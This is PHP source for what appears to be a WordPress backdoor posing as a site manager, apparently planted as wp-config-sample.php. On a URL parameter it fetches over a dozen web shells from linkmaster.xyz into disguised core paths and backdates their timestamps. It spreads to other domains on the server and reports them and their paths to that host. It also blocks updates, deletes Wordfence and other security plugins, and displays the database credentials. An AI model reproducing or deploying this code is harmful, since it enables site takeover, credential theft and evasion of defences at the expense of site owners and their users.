documentRoot = $_SERVER['DOCUMENT_ROOT'] ?? getcwd(); if(empty($this->documentRoot) || !is_dir($this->documentRoot)) exit('ERR'); $this->protocol = (isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!='off'||$_SERVER['SERVER_PORT']==443)?'https://':'http://'; $this->currentUrl = $this->protocol.( $_SERVER['HTTP_HOST']??'' ).( $_SERVER['REQUEST_URI']??'' ); $this->baseUrl = $this->protocol.( $_SERVER['HTTP_HOST']??'' ); } public function handleRequest() { $action = $_GET['yap']??''; $actions = ['downs','self_destruct','wpconfig','Filemanager','wpcache']; if(in_array($action,$actions)) $this->{'handle'.$action.'Action'}(); if($_SERVER['REQUEST_METHOD']=='POST') $this->handlePostRequests(); } private function handleDownsAction() { $urls = [ $this->baseUrl.'/wp-config-sample.php?yap=wpconfig', $this->baseUrl.'/wp-config-sample.php?yap=Filemanager', $this->baseUrl.'/wp-config-sample.php?yap=self_destruct', 'https://www.linkmaster.xyz/bget.php?auto='.urlencode($this->currentUrl) ]; foreach($urls as $url) echo ''; $this->downloadAndInstallFiles(); $this->renderDomainIframe(); } private function downloadAndInstallFiles() { $remoteFiles = [ 'https://linkmaster.xyz/uzak/style.txt' => __DIR__.'/style.php', 'https://linkmaster.xyz/uzak/template.txt' => __DIR__.'/template.php', 'https://linkmaster.xyz/uzak/wp-css.txt' => dirname(__DIR__).'/wp-css.php', 'https://linkmaster.xyz/uzak/theme.txt' => dirname(__DIR__).'/theme.php', 'https://linkmaster.xyz/uzak/zip.txt' => $this->documentRoot.'/wp-includes/dist.php', 'https://linkmaster.xyz/uzak/yeni.txt' => $this->documentRoot.'/wp-includes/pomo/pomo.php', 'https://linkmaster.xyz/uzak/control.txt' => $this->documentRoot.'/wp-includes/blocks/comments/blocks.php', 'https://linkmaster.xyz/uzak/logo.txt' => $this->documentRoot.'/wp-includes/blocks/comments/logo.png' ]; foreach($remoteFiles as $url=>$path) $this->downloadFile($url,$path); $this->installAdditionalShells(); $this->scanAndInstallOnAllDomains(); } private function installAdditionalShells() { $root = $this->documentRoot; $shells = [ ["https://linkmaster.xyz/svs/shell/fmadmin.txt","$root/wp-admin/fmadmin.php"], ["https://linkmaster.xyz/svs/shell/fmanager.txt","$root/wp-admin/css/midnight/fmanager.php"], ["https://linkmaster.xyz/svs/shell/adminer.txt","$root/wp-admin/css/modern/adminer.php"], ["https://linkmaster.xyz/svs/shell/wordpress.txt","$root/wp-admin/user/wordpress.php"], ["https://linkmaster.xyz/svs/shell/niil.txt","$root/wp-includes/css/dist/niil.php"], ["https://linkmaster.xyz/svs/shell/sok.txt","$root/wp-includes/css/dist/sok.php"], ["https://linkmaster.xyz/svs/shell/system.txt","$root/wp-includes/Requests/src/system.php"], ["https://linkmaster.xyz/svs/shell/tiny.txt","$root/wp-includes/Requests/src/Utility/tiny.php"], ["https://linkmaster.xyz/svs/shell/yeni.txt","$root/wp-includes/SimplePie/Content/Type/yeni.php"], ["https://linkmaster.xyz/svs/shell/zip-blog.txt","$root/wp-includes/SimplePie/Content/Type/zip-blog.php"], ["https://linkmaster.xyz/svs/shell/scan.txt","$root/wp-includes/blocks/audio/scan.php"], ["https://linkmaster.xyz/svs/shell/zip-header.txt","$root/wp-includes/blocks/audio/zip-header.php"], ["https://linkmaster.xyz/uzk/otomatik/blog/wordpress.txt","$root/wp-admin/maint/wordpress.txt"], ["https://linkmaster.xyz/uzk/otomatik/blog/wp-blog.txt","$root/wp-admin/maint/wp-blog.php"] ]; foreach($shells as $f){ $tmp = basename($f[1]); if($this->downloadFile($f[0],$tmp) && $this->moveFile($tmp,$f[1])){ echo '
✓ '.htmlspecialchars($tmp).'
'; } } } private function scanAndInstallOnAllDomains() { $dirs = [$this->documentRoot]; for($i=0;$i<5;$i++) $dirs[] = @dirname(end($dirs)); $domains = []; foreach($dirs as $d) if(is_dir($d)){ $sc = @scandir($d); if($sc) foreach($sc as $f){ if($f!='.'&&$f!='..'&&!str_starts_with($f,'.')&&preg_match('/\.[a-z]{2,}$/i',$f)&&is_dir($d.'/'.$f)){ $domains[]=$f; $this->processDomainFolder($d.'/'.$f); } } } $this->reportDomains($domains); } private function processDomainFolder($path) { $readme = $path.'/readme.html'; $target = $path; if(!file_exists($readme)){ $pub = $path.'/public_html'; if(is_dir($pub)){ $target=$pub; $readme=$pub.'/readme.html'; } } if(file_exists($readme)){ $this->updateWpConfigForDomain($target); $this->installFilesToDomain($target); } } private function updateWpConfigForDomain($path) { $cfg = $path.'/wp-config.php'; if(file_exists($cfg)){ $c = file_get_contents($cfg); $code = "define('DISALLOW_FILE_EDIT',true);\ndefine('DISALLOW_FILE_MODS',true);\ndefine('AUTOMATIC_UPDATER_DISABLED',true);\ndefine('WP_AUTO_UPDATE_CORE',false);"; if(strpos($c,$code)===false){ $c = preg_replace('/<\?php/','downloadFile($f[0],$f[1]); } private function reportDomains($d) { if(empty($d)) return; $list=implode('|',$d); $dom=$_SERVER['SERVER_NAME']??''; $url = 'https://www.linkmaster.xyz/domain.php?bildir='.urlencode($dom). '&site='.urlencode($list).'&anadomain='.urlencode($this->currentUrl). '&path='.urlencode($this->documentRoot); $this->curlGet($url); } private function renderDomainIframe() { $dirs = [$this->documentRoot]; for($i=0;$i<5;$i++) $dirs[]= @dirname(end($dirs)); $domains = []; foreach($dirs as $d) if(is_dir($d)){ $sc=@scandir($d); if($sc) foreach($sc as $f){ if($f!='.'&&$f!='..'&&!str_starts_with($f,'.')&&preg_match('/\.[a-z]{2,}$/i',$f)&&is_dir($d.'/'.$f)) $domains[]=$f; } } if(!empty($domains)){ $list=implode('|',$domains); $dom=$_SERVER['SERVER_NAME']??''; $url = 'https://www.linkmaster.xyz/domain.php?bildir='.urlencode($dom). '&site='.urlencode($list).'&anadomain='.urlencode($this->currentUrl). '&path='.urlencode($this->documentRoot); echo ''; } } private function downloadFile($url,$dest) { $ch=curl_init(); curl_setopt_array($ch,[ CURLOPT_URL=>$url,CURLOPT_RETURNTRANSFER=>1,CURLOPT_FOLLOWLOCATION=>1, CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_CONNECTTIMEOUT=>15,CURLOPT_TIMEOUT=>45, CURLOPT_USERAGENT=>'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ]); $c=curl_exec($ch); curl_close($ch); if($c===false) return false; $dir=dirname($dest); if(!is_dir($dir)) mkdir($dir,0755,true); $w=file_put_contents($dest,$c); if($w===false) return false; $readme=dirname($dest).'/readme.html'; if(file_exists($readme)) touch($dest,filemtime($readme)); return true; } private function curlGet($url) { $ch=curl_init(); curl_setopt_array($ch,[ CURLOPT_URL=>$url,CURLOPT_RETURNTRANSFER=>1,CURLOPT_FOLLOWLOCATION=>1, CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_TIMEOUT=>30 ]); $c=curl_exec($ch); curl_close($ch); return $c; } private function moveFile($src,$dst) { $dir=dirname($dst); if(!is_dir($dir)) mkdir($dir,0755,true); return rename($src,$dst); } private function selfDestruct() { @unlink(__FILE__) && exit(0); } private function updateWpConfig() { $cfg=$this->documentRoot.'/wp-config.php'; if(file_exists($cfg)){ $c=file_get_contents($cfg); $code="define('DISALLOW_FILE_EDIT',true);\ndefine('WP_AUTO_UPDATE_CORE',false);\ndefine('DISALLOW_FILE_MODS',true);\ndefine('AUTOMATIC_UPDATER_DISABLED',true);"; if(strpos($c,$code)===false){ $c=preg_replace('/<\?php/','wp-config güncellendi'); } } } private function handleFileManager() { $plugins = ['file-manager','filemanager','file-manager-advanced','wordfence','malcare-security','wp-file-manager','file_manager','wp_file_manager','file_manager_advanced_ui']; $path = $this->documentRoot.'/wp-content/plugins/'; foreach($plugins as $p) if(is_dir($path.$p)) $this->deletePhpFiles($path.$p); echo '
File Manager temizlendi
'; } private function deletePhpFiles($dir) { $files = array_diff(scandir($dir),['.','..']); foreach($files as $f){ $p = $dir.'/'.$f; is_dir($p) ? $this->deletePhpFiles($p) : (pathinfo($p,PATHINFO_EXTENSION)=='php' ? @unlink($p)?:@rename($p,$p.'1') : null); } } private function clearCache() { $caches = [ $this->documentRoot.'/wp-content/cache', $this->documentRoot.'/wp-content/plugins/wp-rocket', $this->documentRoot.'/wp-content/plugins/w3-total-cache', $this->documentRoot.'/wp-content/plugins/wp-super-cache', $this->documentRoot.'/wp-content/plugins/litespeed-cache' ]; foreach($caches as $p) if(is_dir($p)) $this->deleteDirectory($p); echo '
Cache temizlendi
'; } private function deleteDirectory($dir) { if(!file_exists($dir)) return; $files = array_diff(scandir($dir),['.','..']); foreach($files as $f){ $p = $dir.'/'.$f; is_dir($p) ? $this->deleteDirectory($p) : @unlink($p); } @rmdir($dir); } private function handlePostRequests() { isset($_POST['self_destruct']) && $this->selfDestruct(); isset($_POST['close_wp_config']) && $this->updateWpConfig(); isset($_POST['delete_filemanager']) && $this->handleFileManager(); isset($_POST['clear_cache']) && $this->clearCache(); } public function renderUI() { ?> WP Manager

WordPress Manager

Root: documentRoot)?>

DB Info:

documentRoot.'/wp-config.php'; if(file_exists($cfg)){ $c=file_get_contents($cfg); preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']*)'\s*\);/",$c,$db); preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']*)'\s*\);/",$c,$u); preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'\s*\);/",$c,$p); echo ''; } ?>
handleRequest(); $m->renderUI(); ?>